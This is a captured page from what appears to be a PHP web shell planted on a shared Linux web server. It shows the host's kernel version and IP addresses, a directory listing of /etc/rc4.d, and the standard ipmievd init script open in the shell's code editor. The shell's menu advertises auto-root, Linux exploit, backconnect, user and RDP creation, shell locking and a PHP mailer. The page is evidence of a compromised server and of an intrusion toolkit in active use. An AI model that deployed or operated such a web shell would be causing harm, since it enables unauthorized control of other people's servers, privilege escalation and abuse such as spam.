Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
rc4.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
K01apache2
7.99
KB
-rwxr-xr-x
K01ipmievd
3.09
KB
-rwxr-xr-x
K01stunnel4
5.6
KB
-rwxr-xr-x
K01sysstat
1.54
KB
-rwxr-xr-x
S01acct
2.06
KB
-rwxr-xr-x
S01apport
2.85
KB
-rwxr-xr-x
S01atd
1.05
KB
-rwxr-xr-x
S01cachefilesd
7.08
KB
-rwxr-xr-x
S01console-setup.sh
1.2
KB
-rwxr-xr-x
S01cron
2.99
KB
-rwxr-xr-x
S01dbus
3.08
KB
-rwxr-xr-x
S01fail2ban
6.85
KB
-rwxr-xr-x
S01grub-common
985
B
-rwxr-xr-x
S01irqbalance
2.58
KB
-rwxr-xr-x
S01lvm2-lvmpolld
586
B
-rwxr-xr-x
S01mpt-statusd
5.95
KB
-rwxr-xr-x
S01nginx
4.47
KB
-rwxr-xr-x
S01ntp
1.46
KB
-rwxr-xr-x
S01open-vm-tools
1.8
KB
-rwxr-xr-x
S01openipmi
13.46
KB
-rwxr-xr-x
S01plymouth
1.35
KB
-rwxr-xr-x
S01postfix
3.02
KB
-rwxr-xr-x
S01proftpd
5.2
KB
-rwxr-xr-x
S01rsync
4.31
KB
-rwxr-xr-x
S01smartmontools
3.02
KB
-rwxr-xr-x
S01ssh
3.96
KB
-rwxr-xr-x
S01unattended-upgrades
1.36
KB
-rwxr-xr-x
S01uuidd
1.28
KB
-rwxr-xr-x
S01zabbix-agent
1.54
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : K01ipmievd
#! /bin/sh ### BEGIN INIT INFO # Provides: ipmievd # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: IPMI event daemon # Description: ipmievd is a daemon which will listen for events # from the BMC that are being sent to the SEL and # also log those messages to syslog. ### END INIT INFO # # Author: Elmar Hoffmann <elho@elho.net> # Licence: This script is public domain using the same # licence as ipmitool itself. # Modified by: Petter Reinholdtsen # Jörg Frings-Fürst 2014-06-01 set -e PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin DESC="IPMI event daemon" NAME=ipmievd DAEMON=/usr/sbin/$NAME PIDFILE=/var/run/$NAME.pid0 SCRIPTNAME=/etc/init.d/$NAME ENABLED=true # Gracefully exit if the package has been removed. test -x $DAEMON || exit 0 . /lib/lsb/init-functions test -r /etc/default/rcS && . /etc/default/rcS # Options used by ipmievd. # # "open" uses the asynchronous event notification from the OpenIPMI # kernel driver, "sel" uses active polling of the contents of the SEL # for new events. # # Need to force 'daemon' mode, to make sure messages are sent to # syslog and the program forks into the background. # # Se ipmievd(8) for more info. IPMIEVD_OPTIONS="open daemon" # # requested kernelmodules # #REQMODULES="ipmi_devintf ipmi_msghandler ipmi_poweroff ipmi_si ipmi_watchdog" REQMODULES="" # Read config file if it is present. [ -f /etc/default/$NAME ] && . /etc/default/$NAME test "$ENABLED" != "false" || exit 0 # Backwards compatibility with version 1.8.6-2 and 1.8.6-1. The # variable was renamed to be compatible with upstream, SuSe and RedHat. if [ -n "$IPMIEVD_OPTS" ]; then echo "warning: /etc/default/$NAME variable IPMIEVD_OPTS should be renamed to IPMIEVD_OPTIONS" IPMIEVD_OPTIONS="$IPMIEVD_OPTS" fi # # function to load requested kernelmodules do_modprobe() { if [ -x /sbin/modprobe -a -f /proc/modules ] then modprobe -q "$1" || true fi } # # Function that starts the daemon/service. # d_start() { start-stop-daemon --start --quiet --exec $DAEMON --pidfile $PIDFILE -- $IPMIEVD_OPTIONS } # # Function that stops the daemon/service. # d_stop() { start-stop-daemon --stop --oknodo --quiet --name $NAME --exec $DAEMON --pidfile $PIDFILE } CODE=0 case "$1" in start) # load kernelmodules for rmod in ${REQMODULES} do do_modprobe ${rmod} done [ "$VERBOSE" != no ] && log_begin_msg "Starting $DESC" "$NAME" d_start || CODE=$? [ "$VERBOSE" != no ] && log_end_msg $CODE exit $CODE ;; stop) log_begin_msg "Stopping $DESC" "$NAME" d_stop || CODE=$? log_end_msg $CODE exit $CODE ;; restart|force-reload) log_begin_msg "Restarting $DESC" "$NAME" d_stop || true sleep 1 d_start || CODE=$? log_end_msg $CODE exit $CODE ;; status) status_of_proc $DAEMON $NAME ;; *) echo "Usage: $SCRIPTNAME {start|stop|restart|force-reload|status}" >&2 exit 1 ;; esac exit 0
Close